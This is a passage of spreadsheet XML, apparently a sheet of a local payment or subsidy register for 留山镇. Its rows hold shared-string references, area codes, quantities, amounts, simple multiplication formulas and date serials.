    <row r="1312" ht="23" customHeight="1" spans="1:11">
      <c r="A1312" s="13" t="s">
        <v>3504</v>
      </c>
      <c r="B1312" s="14" t="str">
        <f>B1311</f>
        <v>留山镇</v>
      </c>
      <c r="C1312" s="14" t="str">
        <f>C1311</f>
        <v>留山镇</v>
      </c>
      <c r="D1312" s="13" t="s">
        <v>3505</v>
      </c>
      <c r="E1312" s="13" t="s">
        <v>3506</v>
      </c>
      <c r="F1312" s="14">
        <f>F1311</f>
        <v>4113210399</v>
      </c>
      <c r="G1312" s="14"/>
      <c r="H1312" s="14"/>
      <c r="I1312" s="14"/>
      <c r="J1312" s="14"/>
      <c r="K1312" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1313" ht="23" customHeight="1" spans="1:11">
      <c r="A1313" s="13" t="s">
        <v>3507</v>
      </c>
      <c r="B1313" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1313" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1313" s="14" t="s">
        <v>3508</v>
      </c>
      <c r="E1313" s="14" t="s">
        <v>3509</v>
      </c>
      <c r="F1313" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1313" s="14">
        <v>1</v>
      </c>
      <c r="H1313" s="14">
        <v>340</v>
      </c>
      <c r="I1313" s="14">
        <f>H1313*G1313</f>
        <v>340</v>
      </c>
      <c r="J1313" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1313" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1314" ht="23" customHeight="1" spans="1:11">
      <c r="A1314" s="13" t="s">
        <v>3510</v>
      </c>
      <c r="B1314" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1314" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1314" s="14" t="s">
        <v>3511</v>
      </c>
      <c r="E1314" s="14" t="s">
        <v>3512</v>
      </c>
      <c r="F1314" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1314" s="14">
        <v>1</v>
      </c>
      <c r="H1314" s="14">
        <v>340</v>
      </c>
      <c r="I1314" s="14">
        <f>H1314*G1314</f>
        <v>340</v>
      </c>
      <c r="J1314" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1314" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1315" ht="23" customHeight="1" spans="1:11">
      <c r="A1315" s="13" t="s">
        <v>3513</v>
      </c>
      <c r="B1315" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1315" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1315" s="14" t="s">
        <v>3514</v>
      </c>
      <c r="E1315" s="14" t="s">
        <v>3320</v>
      </c>
      <c r="F1315" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1315" s="14">
        <v>2</v>
      </c>
      <c r="H1315" s="14">
        <v>300</v>
      </c>
      <c r="I1315" s="14">
        <f>H1315*G1315</f>
        <v>600</v>
      </c>
      <c r="J1315" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1315" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1316" ht="23" customHeight="1" spans="1:11">
      <c r="A1316" s="13" t="s">
        <v>3515</v>
      </c>
      <c r="B1316" s="14" t="str">
        <f>B1315</f>
        <v>留山镇</v>
      </c>
      <c r="C1316" s="14" t="str">
        <f>C1315</f>
        <v>留山镇</v>
      </c>
      <c r="D1316" s="13" t="s">
        <v>3516</v>
      </c>
      <c r="E1316" s="13" t="s">
        <v>3350</v>
      </c>
      <c r="F1316" s="14">
        <f>F1315</f>
        <v>4113210399</v>
      </c>
      <c r="G1316" s="14"/>
      <c r="H1316" s="14"/>
      <c r="I1316" s="14"/>
      <c r="J1316" s="14"/>
      <c r="K1316" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1317" ht="23" customHeight="1" spans="1:11">
      <c r="A1317" s="13" t="s">
        <v>3517</v>
      </c>
      <c r="B1317" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1317" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1317" s="14" t="s">
        <v>3518</v>
      </c>
      <c r="E1317" s="14" t="s">
        <v>3519</v>
      </c>
      <c r="F1317" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1317" s="14">
        <v>1</v>
      </c>
      <c r="H1317" s="14">
        <v>340</v>
      </c>
      <c r="I1317" s="14">
        <f t="shared" ref="I1317:I1336" si="64">H1317*G1317</f>
        <v>340</v>
      </c>
      <c r="J1317" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1317" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1318" ht="23" customHeight="1" spans="1:11">
      <c r="A1318" s="13" t="s">
        <v>3520</v>
      </c>
      <c r="B1318" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1318" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1318" s="14" t="s">
        <v>3521</v>
      </c>
      <c r="E1318" s="14" t="s">
        <v>3320</v>
      </c>
      <c r="F1318" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1318" s="14">
        <v>1</v>
      </c>
      <c r="H1318" s="14">
        <v>340</v>
      </c>
      <c r="I1318" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1318" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1318" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1319" ht="23" customHeight="1" spans="1:11">
      <c r="A1319" s="13" t="s">
        <v>3522</v>
      </c>
      <c r="B1319" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1319" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1319" s="14" t="s">
        <v>3523</v>
      </c>
      <c r="E1319" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F1319" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1319" s="14">
        <v>1</v>
      </c>
      <c r="H1319" s="14">
        <v>340</v>
      </c>
      <c r="I1319" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1319" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1319" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1320" ht="23" customHeight="1" spans="1:11">
      <c r="A1320" s="13" t="s">
        <v>3524</v>
      </c>
      <c r="B1320" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1320" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1320" s="14" t="s">
        <v>3525</v>
      </c>
      <c r="E1320" s="14" t="s">
        <v>3526</v>
      </c>
      <c r="F1320" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1320" s="14">
        <v>1</v>
      </c>
      <c r="H1320" s="14">
        <v>340</v>
      </c>
      <c r="I1320" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1320" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1320" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1321" ht="23" customHeight="1" spans="1:11">
      <c r="A1321" s="13" t="s">
        <v>3527</v>
      </c>
      <c r="B1321" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1321" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1321" s="14" t="s">
        <v>3528</v>
      </c>
      <c r="E1321" s="14" t="s">
        <v>3529</v>
      </c>
      <c r="F1321" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1321" s="14">
        <v>1</v>
      </c>
      <c r="H1321" s="14">
        <v>340</v>
      </c>
      <c r="I1321" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1321" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1321" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1322" ht="23" customHeight="1" spans="1:11">
      <c r="A1322" s="13" t="s">
        <v>3530</v>
      </c>
      <c r="B1322" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1322" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1322" s="14" t="s">
        <v>3531</v>
      </c>
      <c r="E1322" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F1322" s="14" t="s">
        <v>3532</v>
      </c>
      <c r="G1322" s="14">
        <v>1</v>
      </c>
      <c r="H1322" s="14">
        <v>340</v>
      </c>
      <c r="I1322" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1322" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1322" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1323" ht="23" customHeight="1" spans="1:11">
      <c r="A1323" s="13" t="s">
        <v>3533</v>
      </c>
      <c r="B1323" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1323" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1323" s="14" t="s">
        <v>3534</v>
      </c>
      <c r="E1323" s="14" t="s">
        <v>3320</v>
      </c>
      <c r="F1323" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1323" s="14">
        <v>1</v>
      </c>
      <c r="H1323" s="14">
        <v>340</v>
      </c>
      <c r="I1323" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1323" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1323" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1324" ht="23" customHeight="1" spans="1:11">
      <c r="A1324" s="13" t="s">
        <v>3535</v>
      </c>
      <c r="B1324" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1324" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1324" s="14" t="s">
        <v>3536</v>
      </c>
      <c r="E1324" s="14" t="s">
        <v>3537</v>
      </c>
      <c r="F1324" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1324" s="14">
        <v>1</v>
      </c>
      <c r="H1324" s="14">
        <v>340</v>
      </c>
      <c r="I1324" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1324" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1324" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1325" ht="23" customHeight="1" spans="1:11">
      <c r="A1325" s="13" t="s">
        <v>3538</v>
      </c>
      <c r="B1325" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1325" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1325" s="14" t="s">
        <v>3540</v>
      </c>
      <c r="E1325" s="14" t="s">
        <v>3541</v>
      </c>
      <c r="F1325" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1325" s="14">
        <v>1</v>
      </c>
      <c r="H1325" s="14">
        <v>340</v>
      </c>
      <c r="I1325" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1325" s="24">
        <v>45108</v>
      </c>
      <c r="K1325" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1326" ht="23" customHeight="1" spans="1:11">
      <c r="A1326" s="13" t="s">
        <v>3542</v>
      </c>
      <c r="B1326" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1326" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1326" s="14" t="s">
        <v>3543</v>
      </c>
      <c r="E1326" s="14" t="s">
        <v>3544</v>
      </c>
      <c r="F1326" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1326" s="14">
        <v>1</v>
      </c>
      <c r="H1326" s="14">
        <v>340</v>
      </c>
      <c r="I1326" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1326" s="24">
        <v>45108</v>
      </c>
      <c r="K1326" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1327" ht="23" customHeight="1" spans="1:11">
      <c r="A1327" s="13" t="s">
        <v>3545</v>
      </c>
      <c r="B1327" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1327" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1327" s="14" t="s">
        <v>3546</v>
      </c>
      <c r="E1327" s="14" t="s">
        <v>3547</v>
      </c>
      <c r="F1327" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1327" s="14">
        <v>1</v>
      </c>
      <c r="H1327" s="14">
        <v>340</v>
      </c>
      <c r="I1327" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1327" s="24">
        <v>45108</v>
      </c>
      <c r="K1327" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1328" ht="23" customHeight="1" spans="1:11">
      <c r="A1328" s="13" t="s">
        <v>3548</v>
      </c>
      <c r="B1328" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1328" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1328" s="14" t="s">
        <v>3549</v>
      </c>
      <c r="E1328" s="14" t="s">
        <v>3472</v>
      </c>
      <c r="F1328" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1328" s="14">
        <v>1</v>
      </c>
      <c r="H1328" s="14">
        <v>340</v>
      </c>
      <c r="I1328" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1328" s="24">
        <v>45108</v>
      </c>
      <c r="K1328" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1329" ht="23" customHeight="1" spans="1:11">
      <c r="A1329" s="13" t="s">
        <v>3550</v>
      </c>
      <c r="B1329" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1329" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D1329" s="14" t="s">
        <v>3552</v>
      </c>
      <c r="E1329" s="14" t="s">
        <v>3553</v>
      </c>
      <c r="F1329" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1329" s="14">
        <v>1</v>
      </c>
      <c r="H1329" s="14">
        <v>340</v>
      </c>
      <c r="I1329" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1329" s="24">
        <v>45108</v>
      </c>
      <c r="K1329" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1330" ht="23" customHeight="1" spans="1:11">
      <c r="A1330" s="13" t="s">
        <v>3554</v>
      </c>
      <c r="B1330" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1330" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D1330" s="14" t="s">
        <v>3555</v>
      </c>
      <c r="E1330" s="14" t="s">
        <v>3431</v>
      </c>
      <c r="F1330" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1330" s="14">
        <v>1</v>
      </c>
      <c r="H1330" s="14">
        <v>340</v>
      </c>
      <c r="I1330" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1330" s="24">
        <v>45108</v>
      </c>
      <c r="K1330" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1331" ht="23" customHeight="1" spans="1:11">
      <c r="A1331" s="13" t="s">
        <v>3556</v>
      </c>
      <c r="B1331" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1331" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D1331" s="14" t="s">
        <v>3557</v>
      </c>
      <c r="E1331" s="14" t="s">
        <v>3558</v>
      </c>
      <c r="F1331" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1331" s="14">
        <v>1</v>
      </c>
      <c r="H1331" s="14">
        <v>340</v>
      </c>
      <c r="I1331" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1331" s="24">
        <v>45108</v>
      </c>
      <c r="K1331" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1332" ht="23" customHeight="1" spans="1:11">
      <c r="A1332" s="13" t="s">
        <v>3559</v>
      </c>
      <c r="B1332" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1332" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D1332" s="14" t="s">
        <v>3561</v>
      </c>
      <c r="E1332" s="14" t="s">
        <v>3562</v>
      </c>
      <c r="F1332" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1332" s="14">
        <v>1</v>
      </c>
      <c r="H1332" s="14">
        <v>340</v>
      </c>
      <c r="I1332" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1332" s="24">
        <v>45108</v>
      </c>
      <c r="K1332" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1333" ht="23" customHeight="1" spans="1:11">
      <c r="A1333" s="13" t="s">
        <v>3563</v>
      </c>
      <c r="B1333" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1333" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D1333" s="14" t="s">
        <v>3564</v>
      </c>
      <c r="E1333" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F1333" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1333" s="14">
        <v>1</v>
      </c>
      <c r="H1333" s="14">
        <v>340</v>
      </c>
      <c r="I1333" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1333" s="24">
        <v>45108</v>
      </c>
      <c r="K1333" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1334" ht="23" customHeight="1" spans="1:11">
      <c r="A1334" s="13" t="s">
        <v>3565</v>
      </c>
      <c r="B1334" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1334" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1334" s="14" t="s">
        <v>3566</v>
      </c>
      <c r="E1334" s="14" t="s">
        <v>3374</v>
      </c>
      <c r="F1334" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1334" s="14">
        <v>1</v>
      </c>
      <c r="H1334" s="14">
        <v>340</v>
      </c>
      <c r="I1334" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1334" s="14">
        <v>45139</v>
      </c>
      <c r="K1334" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1335" ht="23" customHeight="1" spans="1:11">
      <c r="A1335" s="13" t="s">
        <v>3567</v>
      </c>
      <c r="B1335" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1335" s="14" t="s">
        <v>3568</v>
      </c>
      <c r="D1335" s="14" t="s">
        <v>3569</v>
      </c>
      <c r="E1335" s="14" t="s">
        <v>3501</v>
      </c>
      <c r="F1335" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1335" s="14">
        <v>1</v>
      </c>
      <c r="H1335" s="14">
        <v>340</v>
      </c>
      <c r="I1335" s="14">
        <f t="shared" si="64"/>
        <v>340</v>
      </c>
      <c r="J1335" s="14">
        <v>45292</v>
      </c>
      <c r="K1335" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1336" ht="23" customHeight="1" spans="1:11">
      <c r="A1336" s="13" t="s">
        <v>3570</v>
      </c>
      <c r="B1336" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1336" s="14" t="s">
        <v>3568</v>
      </c>
      <c r="D1336" s="14" t="s">
        <v>3571</v>
      </c>
      <c r="E1336" s="14" t="s">
        <v>3572</v>
      </c>
      <c r="F1336" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1336" s="14">
        <v>2</v>
      </c>
      <c r="H1336" s="14">
        <v>300</v>
      </c>
      <c r="I1336" s="14">
        <f t="shared" si="64"/>
        <v>600</v>
      </c>
      <c r="J1336" s="14">
        <v>45261</v>
      </c>
      <c r="K1336" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1337" ht="23" customHeight="1" spans="1:11">
      <c r="A1337" s="13" t="s">
        <v>3573</v>
      </c>
      <c r="B1337" s="14" t="str">
        <f>B1336</f>
        <v>留山镇</v>
      </c>
      <c r="C1337" s="14" t="str">
        <f>C1336</f>
        <v>建设居委会</v>
      </c>
      <c r="D1337" s="36" t="s">
        <v>3574</v>
      </c>
      <c r="E1337" s="37" t="s">
        <v>3575</v>
      </c>
      <c r="F1337" s="14">
        <f>F1336</f>
        <v>4113210399</v>
      </c>
      <c r="G1337" s="14"/>
      <c r="H1337" s="14"/>
      <c r="I1337" s="14"/>
      <c r="J1337" s="14"/>
      <c r="K1337" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1338" ht="23" customHeight="1" spans="1:11">
      <c r="A1338" s="13" t="s">
        <v>3576</v>
      </c>
      <c r="B1338" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1338" s="14" t="s">
        <v>3577</v>
      </c>
      <c r="D1338" s="14" t="s">
        <v>3578</v>
      </c>
      <c r="E1338" s="14" t="s">
        <v>3329</v>
      </c>
      <c r="F1338" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1338" s="14">
        <v>1</v>
      </c>
      <c r="H1338" s="14">
        <v>340</v>
      </c>
      <c r="I1338" s="14">
        <f t="shared" ref="I1338:I1372" si="65">H1338*G1338</f>
        <v>340</v>
      </c>
      <c r="J1338" s="14">
        <v>45352</v>
      </c>
      <c r="K1338" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1339" ht="23" customHeight="1" spans="1:11">
      <c r="A1339" s="13" t="s">
        <v>3579</v>
      </c>
      <c r="B1339" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1339" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D1339" s="14" t="s">
        <v>3580</v>
      </c>
      <c r="E1339" s="14" t="s">
        <v>3329</v>
      </c>
      <c r="F1339" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1339" s="14">
        <v>1</v>
      </c>
      <c r="H1339" s="14">
        <v>340</v>
      </c>
      <c r="I1339" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1339" s="14">
        <v>45352</v>
      </c>
      <c r="K1339" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1340" ht="23" customHeight="1" spans="1:11">
      <c r="A1340" s="13" t="s">
        <v>3581</v>
      </c>
      <c r="B1340" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1340" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D1340" s="14" t="s">
        <v>3582</v>
      </c>
      <c r="E1340" s="14" t="s">
        <v>3434</v>
      </c>
      <c r="F1340" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1340" s="14">
        <v>1</v>
      </c>
      <c r="H1340" s="14">
        <v>340</v>
      </c>
      <c r="I1340" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1340" s="14">
        <v>45170</v>
      </c>
      <c r="K1340" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1341" ht="23" customHeight="1" spans="1:11">
      <c r="A1341" s="13" t="s">
        <v>3583</v>
      </c>
      <c r="B1341" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1341" s="14" t="s">
        <v>3568</v>
      </c>
      <c r="D1341" s="14" t="s">
        <v>3584</v>
      </c>
      <c r="E1341" s="14" t="s">
        <v>3585</v>
      </c>
      <c r="F1341" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1341" s="14">
        <v>1</v>
      </c>
      <c r="H1341" s="14">
        <v>340</v>
      </c>
      <c r="I1341" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1341" s="24">
        <v>45474</v>
      </c>
      <c r="K1341" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1342" ht="23" customHeight="1" spans="1:11">
      <c r="A1342" s="13" t="s">
        <v>3586</v>
      </c>
      <c r="B1342" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1342" s="26" t="s">
        <v>3587</v>
      </c>
      <c r="D1342" s="36" t="s">
        <v>3588</v>
      </c>
      <c r="E1342" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F1342" s="38">
        <v>4113210309</v>
      </c>
      <c r="G1342" s="14">
        <v>1</v>
      </c>
      <c r="H1342" s="14">
        <v>340</v>
      </c>
      <c r="I1342" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1342" s="24">
        <v>45566</v>
      </c>
      <c r="K1342" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1343" ht="23" customHeight="1" spans="1:11">
      <c r="A1343" s="13" t="s">
        <v>3590</v>
      </c>
      <c r="B1343" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1343" s="14" t="s">
        <v>3591</v>
      </c>
      <c r="D1343" s="14" t="s">
        <v>3592</v>
      </c>
      <c r="E1343" s="14" t="s">
        <v>2538</v>
      </c>
      <c r="F1343" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1343" s="14">
        <v>1</v>
      </c>
      <c r="H1343" s="14">
        <v>340</v>
      </c>
      <c r="I1343" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1343" s="14">
        <v>45170</v>
      </c>
      <c r="K1343" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1344" ht="23" customHeight="1" spans="1:11">
      <c r="A1344" s="13" t="s">
        <v>3593</v>
      </c>
      <c r="B1344" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1344" s="14" t="s">
        <v>3568</v>
      </c>
      <c r="D1344" s="14" t="s">
        <v>3594</v>
      </c>
      <c r="E1344" s="14" t="s">
        <v>3595</v>
      </c>
      <c r="F1344" s="39" t="s">
        <v>3596</v>
      </c>
      <c r="G1344" s="14">
        <v>1</v>
      </c>
      <c r="H1344" s="14">
        <v>340</v>
      </c>
      <c r="I1344" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1344" s="24">
        <v>45627</v>
      </c>
      <c r="K1344" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1345" ht="23" customHeight="1" spans="1:11">
      <c r="A1345" s="13" t="s">
        <v>3597</v>
      </c>
      <c r="B1345" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1345" s="14" t="s">
        <v>3598</v>
      </c>
      <c r="D1345" s="14" t="s">
        <v>3599</v>
      </c>
      <c r="E1345" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F1345" s="39" t="s">
        <v>3596</v>
      </c>
      <c r="G1345" s="14">
        <v>1</v>
      </c>
      <c r="H1345" s="14">
        <v>340</v>
      </c>
      <c r="I1345" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1345" s="24">
        <v>45627</v>
      </c>
      <c r="K1345" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1346" ht="23" customHeight="1" spans="1:11">
      <c r="A1346" s="13" t="s">
        <v>3600</v>
      </c>
      <c r="B1346" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1346" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D1346" s="14" t="s">
        <v>3601</v>
      </c>
      <c r="E1346" s="14" t="s">
        <v>3541</v>
      </c>
      <c r="F1346" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1346" s="14">
        <v>1</v>
      </c>
      <c r="H1346" s="14">
        <v>340</v>
      </c>
      <c r="I1346" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1346" s="14">
        <v>45200</v>
      </c>
      <c r="K1346" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1347" ht="23" customHeight="1" spans="1:11">
      <c r="A1347" s="13" t="s">
        <v>3602</v>
      </c>
      <c r="B1347" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1347" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1347" s="14" t="s">
        <v>3604</v>
      </c>
      <c r="E1347" s="14" t="s">
        <v>3605</v>
      </c>
      <c r="F1347" s="14" t="s">
        <v>3606</v>
      </c>
      <c r="G1347" s="14">
        <v>1</v>
      </c>
      <c r="H1347" s="14">
        <v>340</v>
      </c>
      <c r="I1347" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1347" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1347" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1348" ht="23" customHeight="1" spans="1:11">
      <c r="A1348" s="13" t="s">
        <v>3607</v>
      </c>
      <c r="B1348" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1348" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1348" s="14" t="s">
        <v>3608</v>
      </c>
      <c r="E1348" s="14" t="s">
        <v>3609</v>
      </c>
      <c r="F1348" s="14" t="s">
        <v>3606</v>
      </c>
      <c r="G1348" s="14">
        <v>1</v>
      </c>
      <c r="H1348" s="14">
        <v>340</v>
      </c>
      <c r="I1348" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1348" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1348" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1349" ht="23" customHeight="1" spans="1:11">
      <c r="A1349" s="13" t="s">
        <v>3610</v>
      </c>
      <c r="B1349" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1349" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1349" s="14" t="s">
        <v>3611</v>
      </c>
      <c r="E1349" s="14" t="s">
        <v>2538</v>
      </c>
      <c r="F1349" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1349" s="14">
        <v>1</v>
      </c>
      <c r="H1349" s="14">
        <v>340</v>
      </c>
      <c r="I1349" s="14">
        <f t="shared" si="65"/>
        <v>340</v>
      </c>
      <c r="J1349" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1349" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1350" ht="23" customHeight="1" spans="1:11">
      <c r="A1350" s="13" t="s">
        <v>3612</v>
      </c>
      <c r="B1350" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="C1350" s="14" t="s">
        <v>3603</v>
      </c>
      <c r="D1350" s="14" t="s">
        <v>3613</v>
      </c>
      <c r="E1350" s="14" t="s">
        <v>3614</v>
      </c>
      <c r="F1350" s="14">
